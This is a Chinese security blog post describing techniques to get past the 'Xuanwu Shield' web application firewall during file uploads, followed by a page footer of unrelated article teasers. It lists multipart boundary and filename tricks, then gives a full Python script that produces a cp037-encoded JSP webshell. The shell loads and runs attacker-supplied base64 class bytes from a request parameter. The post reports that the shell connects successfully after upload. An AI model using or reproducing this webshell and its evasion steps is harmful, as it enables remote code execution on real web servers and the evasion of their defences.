玄武盾的几种绕过姿势

VSole2022-12-28 13:51:12

0x01 文件名绕过

boundary等号前后空格绕过

Content-Type: multipart/form-data;
boundary = ----WebKitFormBoundaryMJPuN1aHyzfAO2m3

boundary等号前后ascii码09绕过

Cp037编码绕过

文件名后加/绕过

畸形请求方法

0x02 文件内容绕过

unicode编码

cp037编码（脚本内置马支持后缀jsp/jspx，都可解析）

编码脚本

#python2
data = '''"1.0"
 encoding=
"cp037"
?>"http://java.sun.com/JSP/Page"
 version=
"1.2"
>  
    class PERFORM extends ClassLoader {
      PERFORM(ClassLoader c) { super(c);}
      public Class bookkeeping(byte[] b) {
        return super.defineClass(b, 0, b.length);
      }
    }
    public byte[] branch(String str) throws Exception {
      Class base64;
      byte[] value = null;
      try {
        base64=Class.forName("sun.misc.BASE64Decoder");
        Object decoder = base64.newInstance();
        value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
      } catch (Exception e) {
        try {
          base64=Class.forName("java.util.Base64");
          Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
          value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
        } catch (Exception ee) {}
      }
      return value;
    }
  
  
    String cls = request.getParameter("xxoo");
    if (cls != null) {
      new PERFORM(this.getClass().getClassLoader()).bookkeeping(branch(cls)).newInstance().equals(new Object[]{request,response});
    }
  
'''
fcp037 = open('cp037.jsp','wb')
fcp037.write(data.encode('cp037'))

生成出来，burp选择paste from file

可以正常连接

本作品采用《CC 协议》，转载必须注明作者和本文链接

玄武盾的几种绕过姿势

2022-12-28 13:51:12

0x01 文件名绕过boundary等号前后空格绕过Content-Type: multipart/form-data;boundary等号前后ascii码09绕过Cp037编码绕过文件名后加/绕过畸形请求方法0x02 文件内容绕过unicode编码cp037编码编码脚本#python2

常见的WAF绕过、进程及识别工具

2022-05-07 06:22:21

WAF简介 WAF对于一些常规漏洞（如注入漏洞、XSS漏洞、命令执行漏洞、文件包含漏洞）的检测大多是基于“正则表达式”和“AI+规则”的方法，因此会有一定的概率绕过其防御。绕过waf的测试中，有很多方法可以使用，以下常用方法：

干货｜常见的WAF绕过、进程及识别工具

2022-06-04 22:19:23

WAF简介WAF对于一些常规漏洞的检测大多是基于“正则表达式”和“AI+规则”的方法，因此会有一定的概率绕过其防御。绕过waf的测试中，有很多方法可以使用，以下常用方法：大小写绕过。

境内外上市企业的数据合规策略（DPO社群成员观点）

2022-05-14 07:16:10

编者按：关于企业上市全过程中的数据安全、网络安全和个人信息保护方面的监管重点、风险和应对，DPO社群中的很多同仁发表过一些文章：企业上市过程面临的数据合规问题和相关风险：境外篇 2021版（DPO社群成员观点）从墨迹IPO被否看拟境内上市企业的数据合规工作（DPO社群成员观点）企业上市过程面临的数据合规问题和相关风险：境外篇（DPO社群成员观点）企业上市过程面临的数据合规问题和相关风

如何解锁制造业数据的价值？

2022-05-26 07:36:18

此前，本公号发表过的关于数据要素治理的相关文章包括：《非个人数据在欧盟境内自由流动框架条例》全文中文翻译（DPO沙龙出品）简析欧盟《数字市场法》关于数据方面的规定数据流通障碍初探——以四个场景为例对“数据共享合法化”的分析与思考系列之一：以《关于欧洲企业间数据共享的研究》为起点对“数据共享合法化”的分析与思考系列之二 ——欧盟B2B数据共享的案例研究对“数据共享合法化”的分析与思考

勒索攻击为什么成为了黑产“财富密码”？

2021-07-22 11:07:48

2021年刚刚过半，勒索病毒的爆发量已超过去年全年总和。7月19日，厄瓜多尔最大的国营电信公司被勒索，导致运营出现大面积故障，勒索病毒再次出现在公众面前。就连最近备受关注的日本东京奥运会，其奥委会称在去年4月的时候也曾遭网络攻击，导致无法访问。

VSole

网络安全专家